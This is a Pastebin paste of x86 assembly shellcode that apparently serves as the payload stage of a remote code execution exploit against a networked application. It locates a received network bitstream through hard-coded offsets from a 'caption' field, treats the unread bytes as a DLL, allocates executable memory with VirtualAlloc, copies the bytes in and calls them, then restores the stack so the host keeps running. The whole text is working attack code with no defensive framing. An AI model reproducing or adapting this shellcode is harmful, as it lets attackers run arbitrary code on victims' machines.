Advertisement
Hidend

Untitled

Apr 15th, 2024
804
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ;# repair stack
  2. lea esp, [ebp-0x128]
  3.  
  4. ;# get bitstream
  5. mov eax, [ebp+0x3c]             ;# caption
  6. sub eax, 0x118                  ;# bitstream
  7. mov ecx, [eax]                  ;# numberOfBitsUsed
  8. mov edx, [eax+0x8]              ;# readOffset
  9. mov esi, [eax+0xC]              ;# data ptr
  10. add ecx, 7                      ;# numberOfBitsUsed bits to bytes
  11. shr ecx, 3          
  12. add edx, 7                      ;# readOffset bits to bytes
  13. shr edx, 3          
  14. sub ecx, edx                    ;# numberOfBitsUsed - readOffset = dll size
  15. add esi, edx                    ;# data ptr         + readOffset = dll ptr
  16.  
  17. ;# check if dll size is 0
  18. test ecx, ecx                   ;# test ecx (dll size)
  19. jz epilogue                     ;# if zero, skip to epilogue
  20.  
  21. ;# call VirtualAlloc
  22. push ecx                        ;# save ecx
  23. push 0x40                       ;# flProtect = PAGE_EXECUTE_READWRITE
  24. push 0x3000                     ;# flAllocationType = MEM_COMMIT | MEM_RESERVE
  25. push ecx                        ;# dwSize = dll size
  26. push 0                          ;# lpAddress = 0
  27. mov eax, dword ptr [0x008581A4] ;# get VirtualAlloc
  28. call eax                        ;# call VirtualAlloc
  29. mov edi, eax
  30. pop ecx                         ;# restore ecx
  31.  
  32. ;# copy dll
  33. rep movsb
  34.  
  35. ;# execute dll
  36. call eax
  37. jmp epilogue                    ;# To be honest, not sure if needed or it does directly go to epilogue
  38.  
  39. epilogue:
  40. pop edi
  41. pop esi
  42. mov eax, 1
  43. pop ebx
  44. mov esp, ebp
  45. pop ebp
  46. ret 8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement